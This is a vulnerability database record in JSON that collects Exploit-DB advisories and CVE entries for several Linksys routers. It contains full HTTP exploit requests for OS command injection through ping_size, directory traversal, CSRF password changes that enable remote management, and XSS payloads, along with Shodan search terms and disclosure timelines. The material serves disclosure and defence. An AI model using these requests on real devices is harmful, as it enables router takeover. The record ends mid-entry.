The attacker needs access to an authenticated browser.\r\n\r\n\r\nPOST /apply.cgi HTTP/1.1\r\nHost: 192.168.178.166\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nProxy-Connection: keep-alive\r\nReferer: http://192.168.178.166/Management.asp\r\nAuthorization: Basic YWRtaW46YWRtaW4=\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 299\r\n\r\nsubmit_button=Management&change_action=&action=Apply&PasswdModify=1&remote_mgt_https=0&http_enable=1&https_enable=0&wait_time=4&need_reboot=0&http_passwd=pwnd&http_passwdConfirm=pwnd&_http_enable=1&web_wl_filter=0&remote_management=1&http_wanport=8080&upnp_enable=1&upnp_config=1&upnp_internet_dis=0\r\n\r\n* CSRF for changing the password without knowing the current one and the attacker is able to activate the remote management:\r\n\r\nhttp://<IP>/apply.cgi?submit_button=Management&change_action=&action=Apply&PasswdModify=1&remote_mgt_https=0&http_enable=1&https_enable=0&wait_time=4&need_reboot=0&http_passwd=pwnd1&http_passwdConfirm=pwnd1&_http_enable=1&web_wl_filter=0&remote_management=1&http_wanport=8080&upnp_enable=1&upnp_config=1&upnp_internet_dis=0\r\n\r\n* reflected XSS\r\n\r\n=> parameter: submit_button\r\n\r\nInjecting scripts into the parameter submit_button reveals that this parameter is not properly validated for malicious input.\r\n\r\nScreenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/reflected-XSS-01.png\r\n\r\nPOST /apply.cgi HTTP/1.1\r\nHost: 192.168.178.166\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nProxy-Connection: keep-alive\r\nReferer: 
http://192.168.178.166/Wireless_Basic.asp\r\nAuthorization: Basic xxxx=\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 155\r\n\r\nsubmit_button=Wireless_Basic'%3balert('pwnd')//&action=Apply&submit_type=&change_action=&next_page=&wl_net_mode=mixed&wl_ssid=test&wl_channel=6&wl_closed=0\r\n\r\n* stored XSS (Access Restrictions -> Richtliniennamen eingeben (place the XSS) -> Zusammenfassung (Scriptcode gets executed)\r\n\r\n=> parameter: f_name\r\n\r\nInjecting scripts into the parameter f_name reveals that this parameter is not properly validated for malicious input. You need to be authenticated or you have to find other methods like CSRF for inserting the malicious JavaScript code.\r\n\r\nScreenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/stored-XSS-Filters.png\r\n\r\n=> Change the request methode from HTTP Post to HTTP GET makes the exploitation easier:\r\n\r\n\r\nhttp://192.168.178.166/apply.cgi?submit_button=Filters&change_action=&submit_type=save&action=Apply&blocked_service=&filter_web=&filter_policy=&f_status=0&f_id=1&f_status1=disable&f_name=123\"><img%20src%3d\"0\"%20onerror%3dalert(\"XSSed1\")>&f_status2=allow&day_all=1&time_all=1&allday=&blocked_service0=None&blocked_service1=None&host0=&host1=&host2=&host3=&url0=&url1=&url2=&url3=&url4=&url5=\r\n\r\n============ Solution ============\r\n\r\nUpgrade your router to the latest firmware version with fixes for XSS and OS Command Injection vulnerabilities.\r\n\r\nFixed Version: Ver.4.30.16 (Build 2)\r\nAvailable since 10.01.2013\r\n\r\nDownload: http://homesupport.cisco.com/en-eu/support/routers/WRT54GL\r\n\r\n============ Credits ============\r\n\r\nThe vulnerability was discovered by Michael Messner\r\nMail: devnull#at#s3cur1ty#dot#de\r\nWeb: http://www.s3cur1ty.de\r\nAdvisory URL: http://www.s3cur1ty.de/m1adv2013-001\r\nTwitter: @s3cur1ty_de\r\n\r\n============ Time Line: ============\r\n\r\nSeptember 2012 - discovered vulnerability\r\n03.10.2012 - Contacted Linksys 
and give them detailed vulnerability details\r\n03.10.2012 - Linksys responded with a case number\r\n11.10.2012 - Status update from Linksys\r\n23.10.2012 - Linksys requested to sign the Beta Agreement for testing the Beta Firmware\r\n29.10.2012 - Send the Beta Agreement back\r\n29.10.2012 - Linksys gives access to the new Beta Firmware\r\n30.10.2012 - Checked the new firmware and verified that the discovered XSS and OS Command Injection vulnerabilities are fixed\r\n30.10.2012 - Linksys responded that there is no ETA of the new firmware\r\n17.01.2013 - Linksys informed me about the public release of mostly fixed version (XSS, OS Command Injection fixed)\r\n18.01.2013 - public release\r\n===================== Advisory end =====================", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/24202/"}, {"lastseen": "2016-02-04T08:14:12", "description": "Cisco Linksys E4200 /apply.cgi Multiple Parameter XSS. CVE-2013-2679. Remote exploit for hardware platform", "published": "2013-04-27T00:00:00", "type": "exploitdb", "title": "Cisco Linksys E4200 /apply.cgi Multiple Parameter XSS", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-2679"], "modified": "2013-04-27T00:00:00", "id": "EDB-ID:38501", "href": "https://www.exploit-db.com/exploits/38501/", "sourceData": "source: http://www.securityfocus.com/bid/59558/info\r\n\r\nThe Cisco Linksys E1200 N300 router is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.\r\n\r\nAn attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.\r\n\r\nCisco Linksys E1200 N300 running firmware 2.0.04 is vulnerable. 
\r\n\r\nhttp://www.example.com/apply.cgi?submit_button=%27%3b%20%3C%2fscript%3E%3Cscript%3Ealert%281%29%3C%2fscript%3E%20%27\r\n\r\nhttp://www.example.com/apply.cgi?submit_button=index%27%3b%20%3c%2f%73%63%72%69%70%74%3e%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e%20%27&change_action=&submit_type=&action=Apply&now_proto=dhcp&daylight_time=1&switch_mode=0&hnap_devicename=Cisco10002&need_reboot=0&user_language=&wait_time=0&dhcp_start=100&dhcp_start_conflict=0&lan_ipaddr=4&ppp_demand_pppoe=9&ppp_demand_pptp=9&ppp_demand_l2tp=9&ppp_demand_hb=9&wan_ipv6_proto=dhcp-tunnel&detect_lang=EN&wan_proto=dhcp&wan_hostname=&wan_domain=&mtu_enable=0&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_ipaddr_2=1&lan_ipaddr_3=1&lan_netmask=255.255.255.0&machine_name=Cisco10002&lan_proto=dhcp&dhcp_check=&dhcp_start_tmp=100&dhcp_num=50&dhcp_lease=0&wan_dns=4&wan_dns0_0=0&wan_dns0_1=0&wan_dns0_2=0&wan_dns0_3=0&wan_dns1_0=0&wan_dns1_1=0&wan_dns1_2=0&wan_dns1_3=0&wan_dns2_0=0&wan_dns2_1=0&wan_dns2_2=0&wan_dns2_3=0&wan_wins=4&wan_wins_0=0&wan_wins_1=0&wan_wins_2=0&wan_wins_3=0&time_zone=-08+1+1&_daylight_time=1 ", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/38501/"}, {"lastseen": "2016-02-02T23:22:59", "description": "Linksys E1500/E2500 - Multiple Vulnerabilities. CVE-2013-2678. Webapps exploit for hardware platform", "published": "2013-02-11T00:00:00", "type": "exploitdb", "title": "Linksys E1500/E2500 - Multiple Vulnerabilities", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-2678"], "modified": "2013-02-11T00:00:00", "id": "EDB-ID:24475", "href": "https://www.exploit-db.com/exploits/24475/", "sourceData": "Device Name: Linksys E1500 / E2500\r\nVendor: Linksys\r\n\r\n============ Device Description: ============\r\n\r\nThe Linksys E1500 is a Wireless-N Router with SpeedBoost. It lets you access the Internet via a wireless connection or through one of its four switched ports. 
You can also use the Linksys E1500 to share resources, such as computers, printers and files.\r\n\r\nThe installation and use of the Linksys E1500 is easy with Cisco Connect, the software that is installed when you run the Setup CD. Likewise, advanced configuration of the Linksys E1500 is available through its web-based setup page.\r\n\r\nSource: http://homekb.cisco.com/Cisco2/ukp.aspx?pid=80&app=vw&vw=1&login=1&json=...\r\n\r\n============ Vulnerable Firmware Releases - e1500: ============\r\n\r\nFirmware-Version: v1.0.00 - build 9 Feb. 17, 2011\r\nFirmware-Version: v1.0.04 - build 2 Mar. 8, 2012\r\nFirmware-Version: v1.0.05 - build 1 Aug. 23, 2012\r\n\r\n============ Vulnerable Firmware Releases - e2500: ============\r\n\r\nFirmware Version: v1.0.03 (only tested for known OS command injection)\r\n\r\nOther versions may also be affected.\r\n\r\n============ Shodan Dorks ============\r\n\r\nShodan Search: linksys e1500\r\nShodan Search: linksys e2500\r\n\r\n============ Vulnerability Overview: ============\r\n\r\n * OS Command Injection / E1500 and E2500 v1.0.03 \r\n\r\n=> Parameter: ping_size=%26ping%20192%2e168%2e178%2e102%26\r\n\r\nThe vulnerability is caused by missing input validation in the ping_size parameter and can be exploited to inject and execute arbitrary shell commands. 
It is possible to start a telnetd or upload and execute a backdoor to compromise the device.\r\nYou need to be authenticated to the device or you have to find other methods for inserting the malicious commands.\r\n\r\nExample Exploit:\r\nPOST /apply.cgi HTTP/1.1\r\nHost: 192.168.178.199\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nProxy-Connection: keep-alive\r\nReferer: http://192.168.178.199/Diagnostics.asp\r\nAuthorization: Basic xxxx\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 185\r\nConnection: close\r\n\r\nsubmit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&action=&commit=0&ping_ip=1.1.1.1&ping_size=%26ping%20192%2e168%2e178%2e102%26&ping_times=5&traceroute_ip=\r\n\r\nChanging the request method from HTTP POST to HTTP GET makes the exploitation easier:\r\n\r\nhttp://192.168.178.199/apply.cgi?submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&action=&commit=0&ping_ip=1.1.1.1&ping_size=%26COMMAND%26&ping_times=5&traceroute_ip=\r\n\r\nScreenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/E1500-os-command-injection-1.0.05-rooted.png\r\n\r\n * Directory traversal - tested on E1500: \r\n\r\n=> parameter: next_page\r\n\r\nAccess local files of the device. 
You need to be authenticated or you have to find other methods for accessing the device.\r\n\r\nRequest:\r\nPOST /apply.cgi HTTP/1.1\r\nHost: 192.168.178.199\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nProxy-Connection: keep-alive\r\nReferer: http://192.168.178.199/Wireless_Basic.asp\r\nAuthorization: Basic YWRtaW46YWRtaW4=\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 75\r\n\r\nsubmit_type=wsc_method2&change_action=gozila_cgi&next_page=../../proc/version\r\n\r\nResponse:\r\nHTTP/1.1 200 Ok\r\nServer: httpd\r\nDate: Thu, 01 Jan 1970 00:00:29 GMT\r\nCache-Control: no-cache\r\nPragma: no-cache\r\nExpires: 0\r\nContent-Type: text/html\r\nConnection: close\r\n\r\nLinux version 2.6.22 (cjc@t.sw3) (gcc version 4.2.3) #10 Thu Aug 23 11:16:42 HKT 2012\r\n\r\nScreenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/E1500-dir-traversal.png\r\n\r\n * Changing the password does not require the current password - tested on E1500 \r\n\r\nWith this vulnerability an attacker is able to change the current password without knowing it. 
The attacker needs access to an authenticated browser.\r\n\r\nExample Request:\r\nPOST /apply.cgi HTTP/1.1\r\nHost: 192.168.1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nProxy-Connection: keep-alive\r\nReferer: http://192.168.1.1/Management.asp\r\nAuthorization: Basic xxxx\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 311\r\n\r\nsubmit_button=Management&change_action=&action=Apply&PasswdModify=1&http_enable=1&https_enable=0&ctm404_enable=&remote_mgt_https=0&wait_time=4&need_reboot=0&http_passwd=admin&http_passwdConfirm=admin&_http_enable=1&web_wl_filter=0&remote_management=0&nf_alg_sip=0&upnp_enable=1&upnp_config=1&upnp_internet_dis=0\r\n\r\n * CSRF for changing the password without knowing the current one and the attacker is able to activate the remote management - tested on E1500: \r\n\r\nhttp://<IP>/apply.cgi?submit_button=Management&change_action=&action=Apply&PasswdModify=1&http_enable=1&https_enable=0&ctm404_enable=&remote_mgt_https=0&wait_time=4&need_reboot=0&http_passwd=password1&http_passwdConfirm=password1&_http_enable=1&web_wl_filter=0&remote_management=1&_remote_mgt_https=1&remote_upgrade=0&remote_ip_any=1&http_wanport=8080&nf_alg_sip=0&upnp_enable=1&upnp_config=1&upnp_internet_dis=0\r\n\r\n * Reflected Cross Site Scripting - tested on E1500 \r\n\r\n=> Parameter: wait_time=3'%3balert('pwnd')//\r\n\r\nInjecting scripts into the parameter wait_time reveals that this parameter is not properly validated for malicious input.\r\n\r\nExample Exploit:\r\nPOST /apply.cgi HTTP/1.1\r\nHost: 192.168.178.199\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: 
de-de,de;q=0.8,en-us;q=0.5,en;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nProxy-Connection: keep-alive\r\nReferer: http://192.168.178.199/Wireless_Basic.asp\r\nAuthorization: Basic xxxx\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 300\r\n\r\nsubmit_button=Wireless_Basic&action=Apply&submit_type=&change_action=&next_page=&commit=1&wl0_nctrlsb=none&channel_24g=0&nbw_24g=20&wait_time=3'%3balert('pwnd')//&guest_ssid=Cisco-guest&wsc_security_mode=&wsc_smode=1&net_mode_24g=mixed&ssid_24g=Cisco&_wl0_nbw=20&_wl0_channel=0&closed_24g=0\r\n\r\nScreenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/E1500-XSS.png\r\n\r\n * Redirection - tested on E1500 \r\n\r\n=> Parameter: submit_button=http://www.pwnd.pwnd%0a\r\n\r\nInjecting URLs into the parameter submit_button reveals that this parameter is not properly validated for malicious input.\r\n\r\nExample Exploit:\r\nPOST /apply.cgi HTTP/1.1\r\nHost: 192.168.178.199\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nProxy-Connection: keep-alive\r\nReferer: http://192.168.178.199/Wireless_Basic.asp\r\nAuthorization: Basic xxxx\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 290\r\n\r\nsubmit_button=http://www.pwnd.pwnd%0a&action=Apply&submit_type=&change_action=&next_page=&commit=1&wl0_nctrlsb=none&channel_24g=0&nbw_24g=20&wait_time=3&guest_ssid=Cisco01589-guest&wsc_security_mode=&wsc_smode=1&net_mode_24g=mixed&ssid_24g=Cisco01589&_wl0_nbw=20&_wl0_channel=0&closed_24g=0\r\n\r\nScreenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/E1500-redirect.png\r\n\r\n============ Solution ============\r\n\r\nNo known solution available.\r\n\r\n============ Credits ============\r\n\r\nThe vulnerability was discovered by Michael Messner\r\nMail: 
devnull#at#s3cur1ty#dot#de\r\nWeb: http://www.s3cur1ty.de\r\nAdvisory URL: http://www.s3cur1ty.de/m1adv2013-004\r\nTwitter: @s3cur1ty_de\r\n\r\n============ Time Line: ============\r\n\r\nOctober 2012 - discovered vulnerability\r\n21.10.2012 - contacted Linksys with vulnerability details\r\n23.10.2012 - Linksys requested to check new firmware v1.0.05 build 1\r\n27.10.2012 - Tested and verified all vulnerabilities in release v1.0.05 build 1\r\n27.10.2012 - contacted Linksys with vulnerability details in release v1.0.05 build 1\r\n29.10.2012 - Linksys responded with case number\r\n13.11.2012 - /me requested update of the progress\r\n15.11.2012 - Linksys sends Beta Agreement\r\n16.11.2012 - Linksys sends the Beta Firmware for testing\r\n16.11.2012 - tested Beta version\r\n18.11.2012 - informed Linksys about the results\r\n30.11.2012 - reported the same OS Command injection vulnerability in model E2500\r\n10.12.2012 - /me requested update of the progress\r\n23.12.2012 - Update to Linksys with directory traversal vulnerability\r\n09.01.2013 - Case closed\r\n05.02.2013 - public release\r\n\r\n===================== Advisory end =====================\r\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/24475/"}, {"lastseen": "2016-02-02T23:23:24", "description": "Linksys WRT160N - Multiple Vulnerabilities. CVE-2013-2678. 
Webapps exploit for hardware platform", "published": "2013-02-11T00:00:00", "type": "exploitdb", "title": "Linksys WRT160N - Multiple Vulnerabilities", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-2678"], "modified": "2013-02-11T00:00:00", "id": "EDB-ID:24478", "href": "https://www.exploit-db.com/exploits/24478/", "sourceData": "Device Name: Linksys WRT160Nv2\r\nVendor: Linksys/Cisco\r\n\r\n============ Device Description: ============ \r\n\r\nBest For: Delivers plenty of speed and coverage, so large groups of users can go online, transfer large files, print, and stream stored media\r\n\r\nFeatures:\r\n * Fast Wireless-N connectivity frees you to do more around your home\r\n * Easy to set up and use, industrial-strength security protection\r\n * Great for larger homes with many users\r\n\r\nSource: http://homestore.cisco.com/en-us/routers/Linksys-WRT160N-Wireless-N-Router-Front-Page_stcVVproductId53934616VVcatId552009VVviewprod.htm\r\n\r\n============ Vulnerable Firmware Releases: ============ \r\n\r\nFirmware Version: v2.0.03 build 009\r\n\r\n============ Shodan Dorks ============ \r\n\r\nShodan Search: WRT160Nv2\r\n\t=> 4072 results\r\n\r\n============ Vulnerability Overview: ============ \r\n\r\n* OS Command Injection\r\n\r\n\t=> parameter: ping_size\r\n\r\nThe vulnerability is caused by missing input validation in the ping_size parameter and can be exploited to inject and execute arbitrary shell commands. 
It is possible to upload and execute a backdoor to compromise the device.\r\nYou need to be authenticated to the device or you have to find other methods for inserting the malicious commands.\r\n\r\nPOST /apply.cgi HTTP/1.1\r\nHost: 192.168.178.233\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nProxy-Connection: keep-alive\r\nReferer: http://192.168.178.233/Diagnostics.asp\r\nAuthorization: Basic XXXX=\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 181\r\nConnection: close\r\n\r\nsubmit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&action=&commit=0&ping_ip=1.1.1.1&ping_size=|ping%20192%2e168%2e178%2e101|&ping_times=5&traceroute_ip=\r\n\r\nChanging the request method from HTTP POST to HTTP GET makes the exploitation easier (CSRF):\r\n\r\nhttp://Target-IP/apply.cgi?submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&action=&commit=0&ping_ip=1.1.1.1&ping_size=|ping%20192%2e168%2e178%2e100|&ping_times=5&traceroute_ip=\r\n\r\nScreenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/WRT160Nv2-OS-Command-Injection.png\r\n\r\n* Directory traversal:\r\n\r\n\t=> parameter: next_page\r\n\t\r\nAccess local files of the device. 
You need to be authenticated or you have to find other methods for accessing the device.\r\n\r\nRequest:\r\nPOST /apply.cgi HTTP/1.1\r\nHost: 192.168.178.233\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nProxy-Connection: keep-alive\r\nReferer: http://192.168.178.233/Wireless_Basic.asp\r\nAuthorization: Basic XXXXX=\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 77\r\n\r\nsubmit_type=wsc_method2&change_action=gozila_cgi&next_page=../../proc/version\r\n\r\nResponse:\r\nHTTP/1.1 200 Ok\r\nServer: httpd\r\nDate: Thu, 01 Jan 1970 02:53:16 GMT\r\nCache-Control: no-cache\r\nPragma: no-cache\r\nExpires: 0\r\nContent-Type: text/html\r\nConnection: close\r\n\r\nLinux version 2.4.30 (tcy@cybertan) (gcc version 3.3.6) #9 Fri Aug 21 11:23:36 CST 2009\r\n\r\nScreenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/WRT160Nv2-directory-traversal.png\r\n\r\n* XSS\r\n\r\nInjecting scripts into the parameter ddns_enable, need_reboot, ping_ip and ping_size reveals that these parameters are not properly validated for malicious input. 
You need to be authenticated or you have to find other methods for inserting the malicious JavaScript code.\r\n\r\n\t=> Setup => DDNS\r\n\t=> parameter ddns_enable\r\n\r\nPOST /apply.cgi HTTP/1.1\r\nHost: 192.168.178.233\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nProxy-Connection: keep-alive\r\nReferer: http://192.168.178.233/DDNS.asp\r\nAuthorization: Basic XXXXX=\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 122\r\n\r\nsubmit_button=DDNS&action=&change_action=gozila_cgi&submit_type=&wait_time=6&ddns_changed=&ddns_enable='%3balert('pwnd')//\r\n\r\n\t=> Setup => Basic Setup\r\n\t=> parameter need_reboot\r\n\r\nPOST /apply.cgi HTTP/1.1\r\nHost: 192.168.178.233\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nProxy-Connection: keep-alive\r\nReferer: http://192.168.178.233/index.asp\r\nAuthorization: Basic XXXX=\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 568\r\n\r\npptp_dhcp=0&submit_button=index&change_action=&submit_type=&action=Apply&now_proto=pppoe&daylight_time=1&lan_ipaddr=4&wait_time=0&need_reboot='%3balert('pwnd')//&dhcp_check=&lan_netmask_0=&lan_netmask_1=&lan_netmask_2=&lan_netmask_3=&timer_interval=30&language=EN&wan_proto=pppoe&ppp_username=pwnd&ppp_passwd=d6nw5v1x2pc7st9m&ppp_service=pwnd&ppp_demand=0&ppp_redialperiod=30&wan_hostname=pwnd&wan_domain=pwnd&mtu_enable=0&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_ipaddr_2=178&lan_ipaddr_3=233&lan_netmask=255.255.255.0&lan_proto=static&time_zone=-08+1+1&_daylight_time=1\r\n\r\n\t=> Administration => Diagnostics\r\n\t=> parameter ping_ip and 
ping_size\r\n\t\r\nPOST /apply.cgi HTTP/1.1\r\nHost: 192.168.178.233\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nProxy-Connection: keep-alive\r\nReferer: http://192.168.178.233/Diagnostics.asp\r\nAuthorization: Basic XXXX=\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 201\r\n\r\nsubmit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&action=&commit=0&ping_ip=1.1.1.1'><script>alert(2)</script>&ping_size=32'><script>alert(1)</script>&ping_times=5&traceroute_ip=\r\n\r\nIt is possible that there are many more XSS Vulnerabilities in this device. I have stopped testing here ... so feel free to check more parameters for input validation problems and XSS vulnerabilities.\r\n\r\n* Changing the password does not require the current password\r\n\r\n\t=> parameter: http_passwd and http_passwdConfirm\r\n\r\nWith this vulnerability an attacker is able to change the current password without knowing it. 
The attacker needs access to an authenticated browser.\r\n\r\nPOST /apply.cgi HTTP/1.1\r\nHost: 192.168.178.233\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nProxy-Connection: keep-alive\r\nReferer: http://192.168.178.233/Management.asp\r\nAuthorization: Basic XXXX=\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 250\r\n\r\nsubmit_button=Management&change_action=&action=Apply&PasswdModify=1&http_enable=1&https_enable=0&wait_time=4&http_passwd=admin&http_passwdConfirm=admin&_http_enable=1&web_wl_filter=0&remote_management=0&upnp_enable=1&upnp_config=1&upnp_internet_dis=0\r\n\r\n* CSRF for changing the password without knowing the current one and the attacker is able to activate the remote management:\r\n\r\nhttp://<IP>/apply.cgi?submit_button=Management&change_action=&action=Apply&PasswdModify=1&http_enable=1&https_enable=0&wait_time=4&http_passwd=admin&http_passwdConfirm=admin&_http_enable=1&web_wl_filter=0&remote_management=0&upnp_enable=1&upnp_config=1&upnp_internet_dis=0\r\n\r\n============ Solution ============\r\n\r\nNo known solution available.\r\n\r\n============ Credits ============\r\n\r\nThe vulnerability was discovered by Michael Messner\r\nMail: devnull#at#s3cur1ty#dot#de\r\nWeb: http://www.s3cur1ty.de/advisories\r\nTwitter: @s3cur1ty_de\r\n\r\n============ Time Line: ============\r\n\r\nDecember 2012 - discovered vulnerability\r\n23.12.2012 - Contacted Linksys and gave them detailed vulnerability details\r\n11.02.2013 - public release\r\n\r\n===================== Advisory end =====================", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/24478/"}], "cve": [{"lastseen": "2021-02-02T06:06:52", "description": "Cisco Linksys E4200 1.0.05 Build 7 devices store passwords in 
cleartext allowing remote attackers to obtain sensitive information.", "edition": 5, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2020-02-05T21:15:00", "title": "CVE-2013-2680", "type": "cve", "cwe": ["CWE-312"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2680"], "modified": "2020-02-07T13:14:00", "cpe": ["cpe:/o:cisco:linksys_e4200_firmware:1.0.05"], "id": "CVE-2013-2680", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2680", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:cisco:linksys_e4200_firmware:1.0.05:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:06:52", "description": "Multiple cross-site scripting (XSS) vulnerabilities in Cisco Linksys E4200 router with firmware 1.0.05 build 7 allow remote attackers to inject arbitrary web script or HTML via the (1) log_type, (2) ping_ip, (3) ping_size, (4) submit_type, or (5) traceroute_ip parameter to apply.cgi or (6) new_workgroup or (7) submit_button parameter to storage/apply.cgi.", "edition": 5, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", 
